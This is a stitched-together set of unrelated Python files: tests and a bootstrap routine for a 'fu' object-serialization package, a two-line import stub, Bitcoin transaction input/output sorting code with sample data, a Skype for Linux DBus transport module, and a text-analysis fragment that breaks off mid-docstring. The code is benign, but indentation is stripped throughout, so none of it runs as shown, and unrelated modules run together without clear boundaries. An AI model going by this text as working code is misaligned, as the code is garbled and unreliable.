@TestCase
def test_func_packunpack():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func)
b = fu.package.unpack(a)
if func is not b and b('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_type_packunpack():
class blah(object):
def func(self, *args):
return ' '.join(args)
a = fu.package.pack(blah)
b = fu.package.unpack(a)
b = b()
if b.func('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_instance_packunpack():
class blah(object):
def func(self, *args):
return ' '.join(args)
a = fu.package.pack(blah())
b = fu.package.unpack(a)
if b.func('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_typevalue_packunpack():
class blah(object):
junk = 'whee'
a = fu.package.pack(blah)
b = fu.package.unpack(a)
if b.junk == 'whee':
raise Success
@TestCase
def test_instancevalue_packunpack():
class blah(object):
junk = 'whee'
a = fu.package.pack(blah())
b = fu.package.unpack(a)
if b.junk == 'whee':
raise Success
@TestCase
def test_class_packunpack():
p = fu.package.pack(A)
result = fu.package.unpack(p)
if result.__name__ == 'A':
raise Success
@TestCase
def test_multiclass_packunpack():
p = fu.package.pack(B)
result = fu.package.unpack(p)
if result().method() == 'B':
raise Success
@TestCase
def test_derived_packunpack():
p = fu.package.pack(C1)
result = fu.package.unpack(p)
if result().method() == 'B':
raise Success
@TestCase
def test_derived_methods_packunpack():
p = fu.package.pack(C1)
result = fu.package.unpack(p)
if result().method_c1() == 'C1' and result().method() == 'B':
raise Success
@TestCase
def test_multiinheritance_packunpack():
p = fu.package.pack(D)
result = fu.package.unpack(p)
if result().method_c1() == 'D' and result().method_c2() == 'C2':
raise Success
@TestCase
def test_bound_method_id_reuse():
class test(object):
def fiver(self):
return 5
class test2(test):
def tenor(self):
return 10
a = test2()
identity = id(a.tenor) == id(a.fiver)
if identity is not True:
raise AssertionError('yay, your python isn\'t lying about id being unique')
if a.tenor() != a.fiver():
raise Success
@TestCase
def test_func_closure():
def fn(a1, a2):
def closure(a3):
return (a1+a2)*a3
return closure
a = fn(1, 2)
b = fu.package.pack(a)
c = fu.package.unpack(b)
if a(222) == int(c('6')):
raise Success
# @TestCase # FIXME
def test_unknown_type():
# error while serializing a 'TypeInfo' object which comes from a module implemented in C
# if we can
import xml.dom.minidom
a = fu.package.pack(xml.dom.minidom)
b = fu.package.unpack(a)
@TestCase
def test_inheritance_native():
class blah([].__class__): pass
x = blah()
x.append(5)
a = fu.package.pack(x)
b = fu.package.unpack(a)
if len(x) == len(b):
raise Success
@TestCase
def test_const_list():
t = type([])
a = fu.package.pack(t)
b = fu.package.unpack(a)
if b is t:
raise Success
@TestCase
def test_type_intbool():
v = 1
a = fu.package.pack(v)
b = fu.package.unpack(a)
if b == v and type(b) == type(v):
raise Success
@TestCase
def test_module_builtin():
import sys
a = fu.pack(sys)
b = fu.unpack(a)
if b is sys:
raise Success
@TestCase
def test_module_general():
import re
a = re.compile('pattern', 0)
b = fu.pack(a)
c = fu.unpack(b)
if (id(b) != id(c)) if sys.version_info.major < 3 else (c is not a):
raise Success
# @TestCase
def test_module():
import fu
a = fu.package.pack(fu)
b = fu.package.unpack(a)
if b.VERSION == fu.VERSION and b is not fu:
raise Success
# @TestCase
def test_ignore_modulepack():
import sys
a = fu.package.pack(sys, local=('sys',))
_, x, y = a
if y[0][x][0] is not fu.module.id:
raise Failure
b = fu.package.unpack(a)
if sys.winver is b.winver:
raise Success
# @TestCase
def test_ignore_moduleunpack():
import _ast as testpackage
a = fu.package.pack(testpackage)
_, x, y = a
if y[0][x][0] is not fu.module_.id:
raise Failure
b = fu.package.unpack(a, local=('_ast',))
if b is testpackage:
raise Success
#@TestCase
def test_ptype_pack():
from ptypes import pint
a = pint.uint32_t()
a.setoffset(id(builtins.type))
result = a.l.value
b = fu.package.unpack(fu.package.pack(a))
if b.value == result:
raise Success
#@TestCase
def test_continuation_yield():
def fn():
yield 1
yield 2
global a, b, c
a = fn()
if a.next() != 1:
raise AssertionError
b = fu.package.pack(a)
c = fu.package.unpack(b)
if c.next() == 2:
raise Success
@TestCase
def test_weakref_packunpack():
import fu, _weakref
a = set(('hello', ))
b = _weakref.ref(a)
c = fu.pack(b)
d = fu.unpack(c)
if list(b()) == list(d()):
raise Success
@TestCase
def test_super_packunpack():
import fu
class blah({item for item in []}.__class__):
def huh(self):
return 5
class blahsub(blah):
def huh(self):
return super(blahsub, self)
# FIXME: this is busted in python2
a = blahsub((20, 40, 60))
b = a.huh()
c = fu.pack(b)
d = fu.unpack(c)
if d.huh() == b.huh():
raise Success
@TestCase
def test_threadlock_packunpack():
import _thread, fu
a = _thread.allocate_lock()
b = fu.pack(a)
c = fu.unpack(b)
if a.__class__ == c.__class__:
raise Success
@TestCase
def test_object_instance_packunpack():
import fu
a = object()
b = fu.pack(a)
c = fu.unpack(b)
if type(a) == type(c) and isinstance(c, type(a)):
raise Success
@TestCase
def test_instancevalue_slots_packunpack():
import fu
class mytype(object):
__slots__ = ['blargh', 'huh']
readonly = 20
#blargh = 500
#huh = 20
a = mytype()
b = fu.unpack(fu.pack(a))
try:
b.blargh = 500
b.huh = 500
except AttributeError:
raise Failure("Unable to assign to slots")
try:
b.readonly = 20
raise Failure("Successfully assigned to a readonly property")
except AttributeError:
pass
try:
b.nope = None
raise Failure("Assigned a property to a __dict__ instead of an allocated slot")
except AttributeError:
pass
if b.blargh == b.huh == 500 and b.readonly == 20:
raise Success
@TestCase
def test_operator_partial():
def muladd(x, y, z):
return x * y + z
f = functools.partial(muladd, 2, 3)
g = fu.unpack(fu.pack(f))
if f(1) == g(1):
raise Success
@TestCase
def test_operator_attrgetter_0():
class t(object):
mine = 5
f = operator.attrgetter('mine')
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_attrgetter_1():
f = operator.attrgetter('mine', 'two')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['mine', 'two']:
raise Success
@TestCase
def test_operator_attrgetter_2():
f = operator.attrgetter('this.is.a.deep', 'one.and.this.one.too')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['this.is.a.deep', 'one.and.this.one.too']:
raise Success
@TestCase
def test_operator_itemgetter_0():
x = {'mine': 5}
f = operator.itemgetter('mine')
g = fu.unpack(fu.pack(f))
if f(x) == g(x):
raise Success
@TestCase
def test_operator_itemgetter_1():
f = operator.itemgetter('mine', 'two')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['mine', 'two']:
raise Success
@TestCase
def test_operator_methodcaller_0():
class t(object):
@classmethod
def mine(cls, x):
return 2 * x
f = operator.methodcaller('mine', 3)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_1():
class t(object):
@classmethod
def mine(cls, x):
return 2 * x
f = operator.methodcaller('mine', x=3)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_2():
class t(object):
@classmethod
def mine(cls, x, **kwargs):
return 2 * x + kwargs.get('y')
f = operator.methodcaller('mine', 3, y=20)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_3():
class t(object):
@classmethod
def mine(cls, x, **kwargs):
return 2 * x + kwargs.get('y')
f = operator.methodcaller('mine', x=3, y=20)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_0():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', 20, 5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_1():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', 20, y=5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_2():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', x=20, y=5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
if __name__ == '__main__':
results = []
for t in TestCaseList:
results.append( t() )
if __name__ == 'bootstrap':
import importlib, marshal, fu
from fu import package
## figure out which type methods we need
st = package.stash()
n = st.store(package)
t1 = set()
t1.update(n for n, _ in st.cons_data.values())
t1.update(n for n, _ in st.inst_data.values())
print(len(t1))
[st.store(fu.package.cache.byid(n)) for n in t1]
t2 = set()
t2.update(n for n, _ in st.cons_data.values())
t2.update(n for n, _ in st.inst_data.values())
print(len(t2))
print(sum(map(len, (fu.package.cache.registration.id, fu.package.cache.registration.type, fu.package.cache.registration.const))))
t = t2
mymethod = type(fu.function.new)
myfunc = type(fu.function.new.im_func)
## serialize the stash methods
stashed_up, stashed_fe = (getattr(st, attr).im_func.func_code for attr in ['unpack_references', 'fetch'])
res = stashed_up, stashed_fe, st.packed()
#marshal.dumps(res)
class mystash:
cons_data = {}
inst_data = {}
def fetch(self, identity, **attributes):
_, data = self.cons_data[identity]
cls, data = self.byid(_), self.unpack_references(data, **attributes)
instance = cls.u_constructor(data, **attributes)
self.fetch_cache[identity] = instance
_, data = self.inst_data[identity]
cls, data = self.byid(_), self.unpack_references(data, **attributes)
_ = cls.u_instance(instance, data, **attributes)
if instance is not _:
raise AssertionError
return instance
namespace = {}
mystash.unpack_references = myfunc(stashed_up, namespace)
mystash.fetch = myfunc(stashed_fe, namespace)
x = mystash()
x.cons_data, x.inst_data = st.packed()
## serialize the necessary type methods
classes = [(n, fu.package.cache.byid(n)) for n in t]
methods = [(n, (cls.__name__, cls.new.im_func.func_code, cls.getclass.im_func.func_code, cls.u_constructor.im_func.func_code, cls.u_instance.im_func.func_code)) for n, cls in classes]
marshal.dumps(methods)
## ensure that we can recreate all these type methods
result = {}
namespace['thread'] = importlib.import_module('thread')
namespace['imp'] = importlib.import_module('imp')
namespace['_weakref'] = importlib.import_module('_weakref')
for n, (name, new, get, cons, inst) in methods:
objspace = {
'new' : myfunc(new, namespace),
'getclass' : myfunc(get, namespace),
'u_constructor' : myfunc(cons, namespace),
'u_instance' : myfunc(inst, namespace),
}
o = type(name, (object,), objspace)()
result[n] = namespace[name] = o
#for attr in ['func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']:
#for n, (new, cons, inst) in methods:
# if any(x.func_closure is not None for x in [cons, inst]):
# raise Exception(n)
# if any(x.func_defaults is not None for x in [cons, inst]):
# raise Exception(n)
# if any(len(x.func_dict) != 0 for x in [cons, inst]):
# raise Exception(n)
# for attr in ['func_code', 'func_name']:
# print(n, attr, repr(getattr(cons, attr)))
# print(n, attr, repr(getattr(inst, attr)))
consdata = st.cons_data
instances = {}
for _, (t, v) in consdata.items():
result[t].u_constructor(v, globals=namespace)
|
from heathcliff.api import SearchAdsAPI
from heathcliff.reporting import SearchAdsReporter |
import binascii
import functools
#returns -1 if barr1 is less, 1 if barr1 is greater, and 0 if equal
def bytearr_cmp(barr1, barr2):
pos = 0
while pos < len(barr1) and pos < len(barr2):
if barr1[pos] < barr2[pos]:
return -1
elif barr1[pos] > barr2[pos]:
return 1
pos = pos + 1
#the shorter array will be ordered first
if len(barr1) < len(barr2):
return -1
elif len(barr1) > len(barr2):
return 1
else:
return 0
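#examples (illustrative):
# bytearr_cmp([0x00, 0xff], [0x01]) == -1 (first differing byte decides)
# bytearr_cmp([0x00], [0x00, 0x01]) == -1 (shorter array orders first)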
#tuples: (prev_tx_hash_byte_arr_little_endian, prev_tx_output_index)
def input_cmp(input_tuple1, input_tuple2):
#test prev_tx_hash_byte_arr_little_endian first
prev_tx_hash_cmp = bytearr_cmp(input_tuple1[0], input_tuple2[0])
if prev_tx_hash_cmp != 0:
return prev_tx_hash_cmp
#tie-breaker: prev_tx_output_index
if input_tuple1[1] < input_tuple2[1]:
return -1
elif input_tuple1[1] > input_tuple2[1]:
return 1
else:
raise ValueError('Matching previous transaction hash and previous transaction output index for two distinct inputs. Invalid!')
def sort_inputs(input_tuples):
#cmp_to_key keeps this working on both Python 2.7 and Python 3
return sorted(input_tuples, key=functools.cmp_to_key(input_cmp))
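#example (illustrative): ties on prev_tx_hash fall through to the output
#index, so sort_inputs([(h, 1), (h, 0)]) == [(h, 0), (h, 1)] for any hash h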
def print_inputs(ordered_input_tuples):
index = 0
for prev_tx_hash_byte_arr_little_endian, prev_tx_output_index in ordered_input_tuples:
prev_tx_hash_hex = binascii.hexlify(bytearray(prev_tx_hash_byte_arr_little_endian))
print("%d: %s[%d]" % (index, prev_tx_hash_hex, prev_tx_output_index))
index = index + 1
#tuples: (amount, scriptPubKey_byte_arr)
def output_cmp(output_tuple1, output_tuple2):
#test amount first
if output_tuple1[0] < output_tuple2[0]:
return -1
elif output_tuple1[0] > output_tuple2[0]:
return 1
#tie-breaker: scriptPubKey_byte_arr
return bytearr_cmp(output_tuple1[1], output_tuple2[1])
def sort_outputs(output_tuples):
return sorted(output_tuples, key=functools.cmp_to_key(output_cmp))
def print_outputs(ordered_output_tuples):
index = 0
for amount, scriptPubKey_byte_arr in ordered_output_tuples:
scriptPubKey_hex = binascii.hexlify(bytearray(scriptPubKey_byte_arr))
print("%d:\t%d\t%s" % (index, amount, scriptPubKey_hex))
index = index + 1
def main():
#reference data: https://blockchain.info/rawtx/0a6a357e2f7796444e02638749d9611c008b253fb55f5dc88b739b230ed0c4c3
tx_0a6a_input_tuples = [
# (prev_tx_hash_byte_arr_little_endian, prev_tx_output_index)
([0x64, 0x3e, 0x5f, 0x4e, 0x66, 0x37, 0x3a, 0x57, 0x25, 0x1f, 0xb1, 0x73, 0x15, 0x1e, 0x83, 0x8c, 0xcd, 0x27, 0xd2, 0x79, 0xac, 0xa8, 0x82, 0x99, 0x7e, 0x00, 0x50, 0x16, 0xbb, 0x53, 0xd5, 0xaa], 0),
([0x28, 0xe0, 0xfd, 0xd1, 0x85, 0x54, 0x2f, 0x2c, 0x6e, 0xa1, 0x90, 0x30, 0xb0, 0x79, 0x60, 0x51, 0xe7, 0x77, 0x2b, 0x60, 0x26, 0xdd, 0x5d, 0xdc, 0xcd, 0x7a, 0x2f, 0x93, 0xb7, 0x3e, 0x6f, 0xc2], 0),
([0xf0, 0xa1, 0x30, 0xa8, 0x49, 0x12, 0xd0, 0x3c, 0x1d, 0x28, 0x49, 0x74, 0xf5, 0x63, 0xc5, 0x94, 0x9a, 0xc1, 0x3f, 0x83, 0x42, 0xb8, 0x11, 0x2e, 0xdf, 0xf5, 0x29, 0x71, 0x59, 0x9e, 0x6a, 0x45], 0),
([0x0e, 0x53, 0xec, 0x5d, 0xfb, 0x2c, 0xb8, 0xa7, 0x1f, 0xec, 0x32, 0xdc, 0x9a, 0x63, 0x4a, 0x35, 0xb7, 0xe2, 0x47, 0x99, 0x29, 0x5d, 0xdd, 0x52, 0x78, 0x21, 0x78, 0x22, 0xe0, 0xb3, 0x1f, 0x57], 0),
([0x38, 0x1d, 0xe9, 0xb9, 0xae, 0x1a, 0x94, 0xd9, 0xc1, 0x7f, 0x6a, 0x08, 0xef, 0x9d, 0x34, 0x1a, 0x5c, 0xe2, 0x9e, 0x2e, 0x60, 0xc3, 0x6a, 0x52, 0xd3, 0x33, 0xff, 0x62, 0x03, 0xe5, 0x8d, 0x5d], 1),
([0xf3, 0x20, 0x83, 0x2a, 0x9d, 0x2e, 0x24, 0x52, 0xaf, 0x63, 0x15, 0x4b, 0xc6, 0x87, 0x49, 0x34, 0x84, 0xa0, 0xe7, 0x74, 0x5e, 0xbd, 0x3a, 0xaf, 0x9c, 0xa1, 0x9e, 0xb8, 0x08, 0x34, 0xad, 0x60], 0),
([0xde, 0x04, 0x11, 0xa1, 0xe9, 0x74, 0x84, 0xa2, 0x80, 0x4f, 0xf1, 0xdb, 0xde, 0x26, 0x0a, 0xc1, 0x9d, 0xe8, 0x41, 0xbe, 0xba, 0xd1, 0x88, 0x0c, 0x78, 0x29, 0x41, 0xac, 0xa8, 0x83, 0xb4, 0xe9], 1),
([0x3b, 0x8b, 0x2f, 0x8e, 0xfc, 0xeb, 0x60, 0xba, 0x78, 0xca, 0x8b, 0xba, 0x20, 0x6a, 0x13, 0x7f, 0x14, 0xcb, 0x5e, 0xa4, 0x03, 0x5e, 0x76, 0x1e, 0xe2, 0x04, 0x30, 0x2d, 0x46, 0xb9, 0x8d, 0xe2], 0),
([0x54, 0xff, 0xff, 0x18, 0x29, 0x65, 0xed, 0x09, 0x57, 0xdb, 0xa1, 0x23, 0x9c, 0x27, 0x16, 0x4a, 0xce, 0x5a, 0x73, 0xc9, 0xb6, 0x2a, 0x66, 0x0c, 0x74, 0xb7, 0xb7, 0xf1, 0x5f, 0xf6, 0x1e, 0x7a], 1),
([0xba, 0xfd, 0x65, 0xe3, 0xc7, 0xf3, 0xf9, 0xfd, 0xfd, 0xc1, 0xdd, 0xb0, 0x26, 0x13, 0x1b, 0x27, 0x8c, 0x3b, 0xe1, 0xaf, 0x90, 0xa4, 0xa6, 0xff, 0xa7, 0x8c, 0x46, 0x58, 0xf9, 0xec, 0x0c, 0x85], 0),
([0xa5, 0xe8, 0x99, 0xdd, 0xdb, 0x28, 0x77, 0x6e, 0xa9, 0xdd, 0xac, 0x0a, 0x50, 0x23, 0x16, 0xd5, 0x3a, 0x4a, 0x3f, 0xca, 0x60, 0x7c, 0x72, 0xf6, 0x6c, 0x47, 0x0e, 0x04, 0x12, 0xe3, 0x40, 0x86], 0),
([0x7a, 0x1d, 0xe1, 0x37, 0xcb, 0xaf, 0xb5, 0xc7, 0x04, 0x05, 0x45, 0x5c, 0x49, 0xc5, 0x10, 0x4c, 0xa3, 0x05, 0x7a, 0x1f, 0x12, 0x43, 0xe6, 0x56, 0x3b, 0xb9, 0x24, 0x5c, 0x9c, 0x88, 0xc1, 0x91], 0),
([0x26, 0xaa, 0x6e, 0x6d, 0x8b, 0x9e, 0x49, 0xbb, 0x06, 0x30, 0xaa, 0xc3, 0x01, 0xdb, 0x67, 0x57, 0xc0, 0x2e, 0x36, 0x19, 0xfe, 0xb4, 0xee, 0x0e, 0xea, 0x81, 0xeb, 0x16, 0x72, 0x94, 0x70, 0x24], 1),
([0x40, 0x2b, 0x2c, 0x02, 0x41, 0x17, 0x20, 0xbf, 0x40, 0x9e, 0xff, 0x60, 0xd0, 0x5a, 0xda, 0xd6, 0x84, 0xf1, 0x35, 0x83, 0x89, 0x62, 0x82, 0x3f, 0x36, 0x14, 0xcc, 0x65, 0x7d, 0xd7, 0xbc, 0x0a], 1),
([0x7d, 0x03, 0x7c, 0xeb, 0x2e, 0xe0, 0xdc, 0x03, 0xe8, 0x2f, 0x17, 0xbe, 0x79, 0x35, 0xd2, 0x38, 0xb3, 0x5d, 0x1d, 0xea, 0xbf, 0x95, 0x3a, 0x89, 0x2a, 0x45, 0x07, 0xbf, 0xbe, 0xeb, 0x3b, 0xa4], 1),
([0x6c, 0x1d, 0x56, 0xf3, 0x1b, 0x2d, 0xe4, 0xbf, 0xc6, 0xaa, 0xea, 0x28, 0x39, 0x6b, 0x33, 0x31, 0x02, 0xb1, 0xf6, 0x00, 0xda, 0x9c, 0x6d, 0x61, 0x49, 0xe9, 0x6c, 0xa4, 0x3f, 0x11, 0x02, 0xb1], 1),
([0xb4, 0x11, 0x2b, 0x8f, 0x90, 0x0a, 0x7c, 0xa0, 0xc8, 0xb0, 0xe7, 0xc4, 0xdf, 0xad, 0x35, 0xc6, 0xbe, 0x5f, 0x6b, 0xe4, 0x6b, 0x34, 0x58, 0x97, 0x49, 0x88, 0xe1, 0xcd, 0xb2, 0xfa, 0x61, 0xb8], 0)]
tx_0a6a_sorted_input_tuples = sort_inputs(tx_0a6a_input_tuples)
print_inputs(tx_0a6a_sorted_input_tuples)
tx_0a6a_output_tuples = [
# (amount, scriptPubKey_byte_arr)
(400057456, [0x76, 0xa9, 0x14, 0x4a, 0x5f, 0xba, 0x23, 0x72, 0x13, 0xa0, 0x62, 0xf6, 0xf5, 0x79, 0x78, 0xf7, 0x96, 0x39, 0x0b, 0xdc, 0xf8, 0xd0, 0x15, 0x88, 0xac]),
(40000000000, [0x76, 0xa9, 0x14, 0x5b, 0xe3, 0x26, 0x12, 0x93, 0x0b, 0x83, 0x23, 0xad, 0xd2, 0x21, 0x2a, 0x4e, 0xc0, 0x3c, 0x15, 0x62, 0x08, 0x4f, 0x84, 0x88, 0xac])]
tx_0a6a_sorted_output_tuples = sort_outputs(tx_0a6a_output_tuples)
print_outputs(tx_0a6a_sorted_output_tuples)
#reference data: https://blockchain.info/rawtx/28204cad1d7fc1d199e8ef4fa22f182de6258a3eaafe1bbe56ebdcacd3069a5f thanks @quantabytes!
tx_2820_input_tuples = [
# (prev_tx_hash_byte_arr, prev_tx_output_index)
(bytearray(binascii.unhexlify("35288d269cee1941eaebb2ea85e32b42cdb2b04284a56d8b14dcc3f5c65d6055")), 0),
(bytearray(binascii.unhexlify("35288d269cee1941eaebb2ea85e32b42cdb2b04284a56d8b14dcc3f5c65d6055")), 1)] #duplicate prev_tx_hash; sorting falls back to the output index
tx_2820_sorted_input_tuples = sort_inputs(tx_2820_input_tuples)
print_inputs(tx_2820_sorted_input_tuples)
tx_2820_output_tuples = [
# (amount, scriptPubKey_byte_arr)
(100000000, [0x41, 0x04, 0x6a, 0x07, 0x65, 0xb5, 0x86, 0x56, 0x41, 0xce, 0x08, 0xdd, 0x39, 0x69, 0x0a, 0xad, 0xe2, 0x6d, 0xfb, 0xf5, 0x51, 0x14, 0x30, 0xca, 0x42, 0x8a, 0x30, 0x89, 0x26, 0x13, 0x61, 0xce, 0xf1, 0x70, 0xe3, 0x92, 0x9a, 0x68, 0xae, 0xe3, 0xd8, 0xd4, 0x84, 0x8b, 0x0c, 0x51, 0x11, 0xb0, 0xa3, 0x7b, 0x82, 0xb8, 0x6a, 0xd5, 0x59, 0xfd, 0x2a, 0x74, 0x5b, 0x44, 0xd8, 0xe8, 0xd9, 0xdf, 0xdc, 0x0c, 0xac]),
(2400000000, [0x41, 0x04, 0x4a, 0x65, 0x6f, 0x06, 0x58, 0x71, 0xa3, 0x53, 0xf2, 0x16, 0xca, 0x26, 0xce, 0xf8, 0xdd, 0xe2, 0xf0, 0x3e, 0x8c, 0x16, 0x20, 0x2d, 0x2e, 0x8a, 0xd7, 0x69, 0xf0, 0x20, 0x32, 0xcb, 0x86, 0xa5, 0xeb, 0x5e, 0x56, 0x84, 0x2e, 0x92, 0xe1, 0x91, 0x41, 0xd6, 0x0a, 0x01, 0x92, 0x8f, 0x8d, 0xd2, 0xc8, 0x75, 0xa3, 0x90, 0xf6, 0x7c, 0x1f, 0x6c, 0x94, 0xcf, 0xc6, 0x17, 0xc0, 0xea, 0x45, 0xaf, 0xac])]
tx_2820_sorted_output_tuples = sort_outputs(tx_2820_output_tuples)
print_outputs(tx_2820_sorted_output_tuples)
if __name__ == "__main__":
main()
|
"""
Low level *Skype for Linux* interface implemented using *dbus-python* package.
This module handles the options that you can pass to `Skype.__init__`
for Linux machines when the transport is set to *DBus*. See below.
- ``RunMainLoop`` (bool) - If set to False, Skype4Py won't start the GLib main
loop. Otherwise it is started in a separate thread. The loop must be running for
Skype4Py events to work properly. Set this option to False if you plan to run the
loop yourself or if, for example, your GUI framework does it for you.
:requires: Skype for Linux 2.0 (beta) or newer.
"""
__docformat__ = 'restructuredtext en'
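# Example (a sketch; the high-level call is an assumption based on the
# docstring above, not taken verbatim from the Skype4Py docs):
#
#     import Skype4Py
#     skype = Skype4Py.Skype(Transport='dbus', RunMainLoop=False)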
import sys
import threading
import time
import warnings
import logging
from Skype4Py.api import Command, SkypeAPIBase, \
timeout2float, finalize_opts
from Skype4Py.enums import *
from Skype4Py.errors import SkypeAPIError
from Skype4Py.utils import cndexp
__all__ = ['SkypeAPI']
if getattr(sys, 'skype4py_setup', False):
# we get here if we're building docs; to let the module import without
# exceptions, we emulate the dbus module using a class:
class dbus(object):
class service(object):
class Object(object):
pass
@staticmethod
def method(*args, **kwargs):
return lambda *args, **kwargs: None
else:
import dbus
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
import gobject
class SkypeNotify(dbus.service.Object):
"""DBus object which exports a Notify method. This will be called by Skype for all
notifications with the notification string as a parameter. The Notify method of this
class calls in turn the callable passed to the constructor.
"""
def __init__(self, bus, notify):
dbus.service.Object.__init__(self, bus, '/com/Skype/Client')
self.notify = notify
@dbus.service.method(dbus_interface='com.Skype.API.Client')
def Notify(self, com):
self.notify(unicode(com))
class SkypeAPI(SkypeAPIBase):
def __init__(self, opts):
self.logger = logging.getLogger('Skype4Py.api.posix_dbus.SkypeAPI')
SkypeAPIBase.__init__(self)
self.run_main_loop = opts.pop('RunMainLoop', True)
finalize_opts(opts)
self.skype_in = self.skype_out = self.dbus_name_owner_watch = None
# initialize glib multithreading support
gobject.threads_init()
# dbus-python calls object.__init__() with arguments passed to SessionBus(),
# this throws a warning on newer Python versions; here we suppress it
warnings.simplefilter('ignore')
try:
self.bus = dbus.SessionBus(mainloop=DBusGMainLoop())
finally:
warnings.simplefilter('default')
if self.run_main_loop:
self.mainloop = gobject.MainLoop()
def run(self):
self.logger.info('thread started')
if self.run_main_loop:
self.mainloop.run()
self.logger.info('thread finished')
def close(self):
if self.run_main_loop:
self.mainloop.quit()
self.skype_in = self.skype_out = None
if self.dbus_name_owner_watch is not None:
self.bus.remove_signal_receiver(self.dbus_name_owner_watch)
self.dbus_name_owner_watch = None
SkypeAPIBase.close(self)
def set_friendly_name(self, friendly_name):
SkypeAPIBase.set_friendly_name(self, friendly_name)
if self.skype_out:
self.send_command(Command('NAME %s' % friendly_name))
def start_watcher(self):
# starts a signal receiver detecting Skype being closed/opened
self.dbus_name_owner_watch = self.bus.add_signal_receiver(self.dbus_name_owner_changed,
'NameOwnerChanged',
'org.freedesktop.DBus',
'org.freedesktop.DBus',
'/org/freedesktop/DBus',
arg0='com.Skype.API')
def attach(self, timeout, wait=True):
self.acquire()
try:
try:
if not self.isAlive():
self.start_watcher()
self.start()
except AssertionError:
pass
try:
self.wait = True
t = threading.Timer(timeout2float(timeout), lambda: setattr(self, 'wait', False))
if wait:
t.start()
while self.wait:
if not wait:
self.wait = False
try:
if not self.skype_out:
self.skype_out = self.bus.get_object('com.Skype.API', '/com/Skype')
if not self.skype_in:
self.skype_in = SkypeNotify(self.bus, self.notify)
except dbus.DBusException:
if not wait:
break
time.sleep(1.0)
else:
break
else:
raise SkypeAPIError('Skype attach timeout')
finally:
t.cancel()
command = Command('NAME %s' % self.friendly_name, '', True, timeout)
if self.skype_out:
self.release()
try:
self.send_command(command)
finally:
self.acquire()
if command.Reply != 'OK':
self.skype_out = None
self.set_attachment_status(apiAttachRefused)
return
self.set_attachment_status(apiAttachSuccess)
finally:
self.release()
command = Command('PROTOCOL %s' % self.protocol, Blocking=True)
self.send_command(command)
self.protocol = int(command.Reply.rsplit(None, 1)[-1])
def is_running(self):
try:
self.bus.get_object('com.Skype.API', '/com/Skype')
return True
except dbus.DBusException:
return False
def startup(self, minimized, nosplash):
# options are not supported as of Skype 1.4 Beta for Linux
if not self.is_running():
import os
if os.fork() == 0: # we're child
os.setsid()
os.execlp('skype', 'skype') # execlp requires the program name as argv[0] too
def shutdown(self):
import os
from signal import SIGINT
fh = os.popen('ps -o %p --no-heading -C skype')
pid = fh.readline().strip()
fh.close()
if pid:
os.kill(int(pid), SIGINT)
self.skype_in = self.skype_out = None
def send_command(self, command):
if not self.skype_out:
self.attach(command.Timeout)
self.push_command(command)
self.notifier.sending_command(command)
cmd = u'#%d %s' % (command.Id, command.Command)
self.logger.debug('sending %s', repr(cmd))
if command.Blocking:
if self.run_main_loop:
command._event = event = threading.Event()
else:
command._loop = loop = gobject.MainLoop()
command._set = False
else:
command._timer = timer = threading.Timer(command.timeout2float(), self.pop_command, (command.Id,))
try:
result = self.skype_out.Invoke(cmd)
except dbus.DBusException, err:
raise SkypeAPIError(str(err))
if result.startswith(u'#%d ' % command.Id):
self.notify(result)
if command.Blocking:
if self.run_main_loop:
event.wait(command.timeout2float())
if not event.isSet():
raise SkypeAPIError('Skype command timeout')
elif not command._set:
gobject.timeout_add_seconds(int(command.timeout2float()), loop.quit)
loop.run()
if not command._set:
raise SkypeAPIError('Skype command timeout')
else:
timer.start()
def notify(self, cmd):
cmd = unicode(cmd)
self.logger.debug('received %s', repr(cmd))
if cmd.startswith(u'#'):
p = cmd.find(u' ')
command = self.pop_command(int(cmd[1:p]))
if command is not None:
command.Reply = cmd[p + 1:]
if command.Blocking:
if self.run_main_loop:
command._event.set()
else:
command._set = True
command._loop.quit()
else:
command._timer.cancel()
self.notifier.reply_received(command)
else:
self.notifier.notification_received(cmd[p + 1:])
else:
self.notifier.notification_received(cmd)
def dbus_name_owner_changed(self, name, old_owner, new_owner):
self.logger.debug('received dbus name owner changed')
if new_owner == '':
self.skype_out = None
self.set_attachment_status(cndexp((new_owner == ''),
apiAttachNotAvailable,
apiAttachAvailable))
|
from BeautifulSoup import BeautifulSoup
from glob import glob
from collections import defaultdict
from math import log, exp
from random import random
import zlib
from apps.rss_feeds.models import MStory
from nltk import FreqDist
def lgammln(xx):
"""
Returns the natural log of the gamma function of xx.
